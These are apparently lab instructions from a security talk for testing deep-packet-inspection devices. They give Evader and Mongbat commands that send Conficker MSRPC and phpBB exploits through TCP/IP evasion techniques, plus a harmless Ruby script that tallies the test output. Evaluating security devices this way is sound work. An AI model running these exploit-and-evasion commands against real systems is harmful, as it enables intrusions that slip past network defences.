Instructions for repeating the evasion test cases used in the presentation "Evading Deep Inspection for Fun and Shell".
Note that you will need a vulnerable victim host for both exploits.


Baseline tests with obfuscated exploit and no evasions:
	./evader --attack=conficker --if=<eth_iface> --src_ip=<src_ip> --dst_ip=<windows_dst_ip> --obfuscate
	./evader --attack=http_phpbb_highlight --if=<eth_iface> --src_ip=<src_ip> --dst_ip=<phpbb_dst_ip> --obfuscate

Evasion tests with Mongbat:
	Base mongbat command with network configuration is as follows:
		ruby mongbat.rb --mode=random --workers=16 --time=60 --stop_on_success --iface=<eth_iface> --attacker=<src_ip>

	Parameters for MSRPC exploit without stages:
		--attack=conficker --victim=<windows_dst_ip> --use_stages=false
	Parameters for MSRPC exploit with stages:
		--attack=conficker --victim=<windows_dst_ip> --use_stages=true
	Parameters for HTTP exploit:
		--attack=http_phpbb_highlight --victim=<phpbb_dst_ip>

	Parameters for test cases:
		1:	--use_evasions=tcp_paws
		2:	--use_evasions=tcp_synretranswithpayload
		3:	--use_evasions=ipv4_opt
		4:	--use_evasions=tcp_urgent
		5:	--use_evasions=tcp_recv_window
		6:	--use_evasions=tcp_seg,tcp_order --min_evasions=2
		7:	--use_evasions=tcp_seg,tcp_order,tcp_paws --min_evasions=3
		8:	--use_evasions=tcp_seg,tcp_order,tcp_synretranswithpayload --min_evasions=3
		9:	--use_evasions=tcp_seg,tcp_order,ipv4_opt --min_evasions=3
		10:	--use_evasions=tcp_seg,tcp_order,tcp_urgent --min_evasions=3
		11:	--use_evasions=tcp_seg,tcp_order,tcp_recv_window --min_evasions=3
		12:	--use_evasions=tcp_seg,tcp_order,tcp_recv_window,tcp_paws,tcp_synretranswithpayload,ipv4_opt,tcp_urgent

	Example command line for HTTP exploit and test case 6:
		ruby mongbat.rb --mode=random --workers=16 --time=60 --stop_on_success --iface=eth0 --attacker=10.1.1.10 --attack=http_phpbb_highlight --victim=10.1.1.200 --use_evasions=tcp_seg,tcp_order --min_evasions=2

	Note that while Mongbat is executing it prints a '.' for each attack that was executed and blocked, a 'C' for each failed clean
	check, and the longer Evader output for a successful attack.
	When a run results in 'C', the run is stopped before the exploit is actually sent, because the victim host has been determined
	to be down. If all attacks result in 'C', either the victim host really is down or the security device under test is also blocking
	normal traffic. If the security device is blocking normal traffic and still needs to be tested, the victim check must be disabled
	by adding --check_victim=false to the Mongbat command line.
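	The following script is an added example, not part of Evader or Mongbat, that summarizes a saved Mongbat progress stream
	according to the meaning of the output characters described above. It assumes that progress lines consist only of '.' and 'C'
	characters and that any other non-blank text is Evader output belonging to one successful run; the sample output embedded in
	it is constructed for illustration and is not real tool output.

```ruby
# Added example (not Evader/Mongbat code): classify a captured Mongbat run.
# Assumed output conventions, taken from the README text above:
#   '.'  attack executed and blocked by the device under test
#   'C'  clean (victim reachability) check failed, exploit not sent
#   any other non-blank line  Evader output for a successful attack
# Consecutive non-progress lines are treated as one Evader report.

# Constructed sample (not real Mongbat output): 9 blocked attempts, one failed
# clean check, and one two-line Evader report standing in for a success.
SAMPLE_OUTPUT = <<~OUT
  ....C..
  [constructed Evader output, line 1]
  [constructed Evader output, line 2]
  ...
OUT

Summary = Struct.new(:blocked, :clean_check_failed, :succeeded, :verdict)

VERDICT_TEXT = {
  no_results:          "no attack results found in the captured output",
  evasion_succeeded:   "at least one evasion reached the victim: the device under test failed",
  victim_check_failed: "every run failed the victim check: victim host is down or the device also blocks normal traffic " \
                       "(rerun with --check_victim=false only if you know the device is the cause)",
  all_blocked:         "every executed attack was blocked; no clean-check failures"
}.freeze

def summarize_mongbat(text)
  blocked = clean_fail = succeeded = 0
  in_evader_output = false

  text.each_line do |raw|
    line = raw.strip
    next if line.empty?

    if line.match?(/\A[.C]+\z/)
      # Pure progress line: count each marker individually.
      blocked    += line.count('.')
      clean_fail += line.count('C')
      in_evader_output = false
    else
      # Anything else is Evader output; count a block of it once.
      succeeded += 1 unless in_evader_output
      in_evader_output = true
    end
  end

  total = blocked + clean_fail + succeeded
  verdict =
    if total.zero?               then :no_results
    elsif succeeded > 0          then :evasion_succeeded
    elsif clean_fail == total    then :victim_check_failed
    else                              :all_blocked
    end

  Summary.new(blocked, clean_fail, succeeded, verdict)
end

if __FILE__ == $0
  s = summarize_mongbat(ARGV.empty? ? SAMPLE_OUTPUT : File.read(ARGV[0]))
  puts "blocked=#{s.blocked} clean_check_failed=#{s.clean_check_failed} succeeded=#{s.succeeded}"
  puts VERDICT_TEXT[s.verdict]
end
```

	Run it with a file containing saved Mongbat output as its only argument, or with no argument to see the constructed sample
	classified; the :victim_check_failed verdict is the "all 'C'" situation the paragraph above describes.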
